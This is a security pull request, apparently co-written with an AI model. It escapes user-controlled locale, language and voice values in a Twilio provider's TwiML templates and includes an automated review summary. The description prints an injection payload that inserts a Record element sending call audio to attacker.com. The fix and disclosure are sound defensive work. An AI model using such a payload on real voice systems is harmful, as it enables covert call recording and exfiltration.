### PR TITLE
Security: Fix TwiML injection via unescaped locale/language/voice parameters

### DIFF
--- a/extensions/voice-call/src/providers/twilio.ts
+++ b/extensions/voice-call/src/providers/twilio.ts
@@ -533,7 +533,7 @@ export class TwilioProvider implements VoiceCallProvider {
     const pollyVoice = mapVoiceToPolly(input.voice);
     const twiml = `<?xml version="1.0" encoding="UTF-8"?>
 <Response>
-  <Say voice="${pollyVoice}" language="${input.locale || "en-US"}">${escapeXml(input.text)}</Say>
+  <Say voice="${escapeXml(pollyVoice)}" language="${escapeXml(input.locale || "en-US")}">${escapeXml(input.text)}</Say>
   <Gather input="speech" speechTimeout="auto" action="${escapeXml(webhookUrl)}" method="POST">
     <Say>.</Say>
   </Gather>
@@ -594,7 +594,7 @@ export class TwilioProvider implements VoiceCallProvider {
 
     const twiml = `<?xml version="1.0" encoding="UTF-8"?>
 <Response>
-  <Gather input="speech" speechTimeout="auto" language="${input.language || "en-US"}" action="${escapeXml(webhookUrl)}" method="POST">
+  <Gather input="speech" speechTimeout="auto" language="${escapeXml(input.language || "en-US")}" action="${escapeXml(webhookUrl)}" method="POST">
   </Gather>
 </Response>`;
 


### PR DESCRIPTION
## Summary

The Twilio voice call provider constructed TwiML XML responses with user-controlled `locale`, `language`, and `voice` parameters directly interpolated into XML attributes without escaping. This allowed injection of arbitrary TwiML elements (Record, Redirect, Dial).

## Security Impact

| Metric | Value |
|--------|-------|
| **CVSS Score** | 8.5 / 10.0 |
| **Severity** | High |
| **CWE** | CWE-91 (XML Injection), CWE-116 (Improper Encoding) |

## Attack Vector

An attacker could craft a malicious locale parameter to inject TwiML elements:
```json
{
  "locale": "en-US\"><Record maxLength=\"60\" action=\"https://attacker.com/record\"/><Say language=\"en-US"
}
```

This would cause Twilio to record calls and send audio to the attacker.

## Fix

Applied `escapeXml()` to all user-controlled parameters in TwiML templates:
- `input.locale` (line 536)
- `input.language` (line 597)
- `pollyVoice` (line 536) - derived from user input via `mapVoiceToPolly()`

The `escapeXml()` function was already used for `webhookUrl` and `input.text` in the same templates.

Fixes #10229

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>

<!-- greptile_comment -->

<h2>Greptile Overview</h2>

<h3>Greptile Summary</h3>

- Escapes user-controlled `voice`, `locale`, and `language` values before interpolating them into TwiML XML attributes in the Twilio provider.
- Keeps existing escaping for `input.text` and `webhookUrl`, closing an XML/TwiML injection vector via attribute breaking.
- Change is localized to `extensions/voice-call/src/providers/twilio.ts` and uses the existing `escapeXml()` utility from `extensions/voice-call/src/voice-mapping.ts`.

<h3>Confidence Score: 5/5</h3>

- This PR is safe to merge with minimal risk.
- The change is narrowly scoped to escaping values interpolated into XML attributes, uses an existing escaping helper that covers the relevant XML special characters, and does not alter control flow or external integrations beyond output encoding.
- No files require special attention

<!-- greptile_other_comments_section -->

<sub>(3/5) Reply to the agent's comments like "Can you suggest a fix for this @greptileai?" or ask follow-up questions!</sub>

<!-- /greptile_comment -->